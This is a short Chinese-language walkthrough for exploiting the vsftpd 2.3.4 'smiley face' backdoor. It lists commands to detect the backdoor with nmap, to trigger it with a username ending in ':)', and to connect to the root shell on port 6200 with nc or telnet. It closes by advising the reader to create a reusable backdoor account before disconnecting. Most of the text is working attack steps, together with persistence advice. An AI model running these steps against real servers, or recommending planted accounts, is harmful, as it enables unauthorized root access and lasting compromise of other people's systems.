前言

VSFTP（Very Secure FTP；最安全的FTP）在版本2.3.4中存在一个后门SHELL，拥有ROOT权限，因为触发开启后门条件的因素是:)，所以该漏洞也被成为笑脸漏洞

使用Nmap脚本检测漏洞

1

nmap -n --script ftp-vsftpd-backdoor -p21 [IP]

触发漏洞

1

ftp [IP]

用户名：[username]:)

密码：随便填写

查看并使用后门端口

1

nmap -n -p 6200 [IP]

使用nc或telnet连接后门端口

1

nc [IP] 6200

1

telnet [IP] 6200

注：使用该命令行执行命令后面需要加;，推荐使用nc连接后门端口，后门端口使用一次后将会被关闭，建议断开前创建后门账户等可重复利用的后门。